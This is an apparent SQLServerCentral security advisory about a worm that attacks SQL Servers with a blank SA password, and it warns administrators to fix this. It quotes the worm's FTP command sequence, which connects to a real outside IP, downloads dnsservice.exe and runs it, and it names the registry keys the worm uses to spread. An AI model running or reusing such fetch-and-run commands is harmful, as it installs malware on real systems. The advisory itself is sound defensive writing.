SQLServerCentral Article

Security Alert : SQL Server Worm Virus Attacking Systems

,

The virus community has moved it's targets to SQL Server over the past few

days while a new worm virus begun to attack vulnerable SQL Servers. The exploit

focuses on servers that have no password set for the SA account and use SQL and

Windows authentication. (Note: If you use Windows Authentication, you will not

need to worry about this.) While this version of the worm may not spread too

quickly, it does pose as an alarm for this type of exploit in the future.

The virus begins by logging into your machine from another infected machine

with SA and no password. Once connected, the following commands are issued:

ftp 207.29.192.160

user = ftp

password = foo.com

bin

cd pub

cd tmp

get dnsservice.exe

close

quit

start dnsservice.exe

This string of events pull down a file from the IP address 207.29.192.160.

The dnsservice.exe file that it pulls down has since been removed from the FTP

site, but the virus may have the capability to repoint itself to another server.

Once the virus downloads the dnsservice.exe, it starts the file and cleans up

itself using xp_cmdshell commands.

It then notifies a chat (IRC) server as a way of checking in. One can only

theorize that this was the creators way of seeing how successful the virus was.

The worm will then use the following registry keys to determine what other

servers you have registered. Upon finding one, it moves to infect it. 

These keys show the servers registered in your Enterprise Manager:

SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\

SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\

On top of infecting other machines, it will begin a port scan to determine who

else it can infect. One of the scariest things about this virus is that it does

broadcast some of your server information through a public IRC channel.

Expect to not see a patch from Microsoft on this virus. This is not a

Microsoft vulnerability. It will only infect servers where the SA account is set

to blank (NULL). This worm is not isolated to servers that are on the Internet

keep in mind. For example, if I have Personal Edition of SQL Server installed on

my machine that has Internet access, my machine may be infected as well as that

presets itself as a gateway to firewall protected servers in my private network.

This virus hasn't picked up any steam yet and I don't see this version of the

virus ever. But, future releases that don't rely on public FTP sites or IRC may

be a further threat. If you still have a SQL Server installed anywhere on your

network with a blank SA password, let this serve as your warning shot across the

bow. Future worms like this may not be so easy to stop.

Rate

You rated this post out of 5. Change rating

Share

Share

Rate

You rated this post out of 5. Change rating